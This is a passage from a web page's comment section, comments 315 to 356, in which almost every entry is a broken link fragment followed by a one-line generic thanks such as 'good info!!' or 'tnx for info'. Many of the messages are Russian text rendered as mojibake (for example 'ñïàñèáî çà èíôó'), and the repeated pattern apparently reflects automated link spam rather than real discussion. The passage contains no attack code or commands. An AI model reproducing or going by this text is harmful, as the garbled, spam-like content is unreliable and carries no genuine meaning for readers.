  315. [email protected]” rel=”nofollow”>.…

    good info!!…

  316. [email protected]” rel=”nofollow”>.…

    ñïàñèáî….

  317. [email protected]” rel=”nofollow”>.…

    thank you….

  318. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó….

  319. [email protected]” rel=”nofollow”>.…

    áëàãîäàðþ….

  320. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó….

  321. [email protected]” rel=”nofollow”>.…

    tnx!…

  322. [email protected]” rel=”nofollow”>.…

    áëàãîäàðñòâóþ….

  323. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!!…

  324. [email protected]” rel=”nofollow”>.…

    thanks for information!!…

  325. [email protected]” rel=”nofollow”>.…

    thanks!!…

  326. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó….

  327. [email protected]” rel=”nofollow”>.…

    tnx for info….

  328. [email protected]” rel=”nofollow”>.…

    tnx!!…

  329. [email protected]” rel=”nofollow”>.…

    ñïñ!…

  330. [email protected]” rel=”nofollow”>.…

    ñïàñèáî!!…

  331. [email protected]” rel=”nofollow”>.…

    ñïñ!!…

  332. [email protected]” rel=”nofollow”>.…

    hello!…

  333. [email protected]” rel=”nofollow”>.…

    ñïñ!!…

  334. [email protected]” rel=”nofollow”>.…

    thanks for information….

  335. [email protected]” rel=”nofollow”>.…

    áëàãîäàðåí!…

  336. [email protected]” rel=”nofollow”>.…

    good info!…

  337. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!…

  338. [email protected]” rel=”nofollow”>.…

    thank you….

  339. [email protected]” rel=”nofollow”>.…

    ñïàñèáî!…

  340. [email protected]” rel=”nofollow”>.…

    hello!…

  341. [email protected]” rel=”nofollow”>.…

    good!!…

  342. [email protected]” rel=”nofollow”>.…

    tnx for info!!…

  343. [email protected]” rel=”nofollow”>.…

    ñïñ çà èíôó….

  344. [email protected]” rel=”nofollow”>.…

    ñýíêñ çà èíôó….

  345. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!!…

  346. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó….

  347. [email protected]” rel=”nofollow”>.…

    thank you….

  348. [email protected]” rel=”nofollow”>.…

    thanks for information!!…

  349. [email protected]” rel=”nofollow”>.…

    ñïñ….

  350. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!…

  351. [email protected]” rel=”nofollow”>.…

    ñïàñèáî çà èíôó!!…

  352. [email protected]” rel=”nofollow”>.…

    good….

  353. [email protected]” rel=”nofollow”>.…

    ñïàñèáî!!…

  354. [email protected]” rel=”nofollow”>.…

    ñïñ!…

  355. [email protected]” rel=”nofollow”>.…

    tnx for info!!…

  356. [email protected]” rel=”nofollow”>.…

    ñýíêñ çà èíôó….

Discussion Area - Leave a Comment




*
To prove that you're not a bot, enter this code
Anti-Spam Image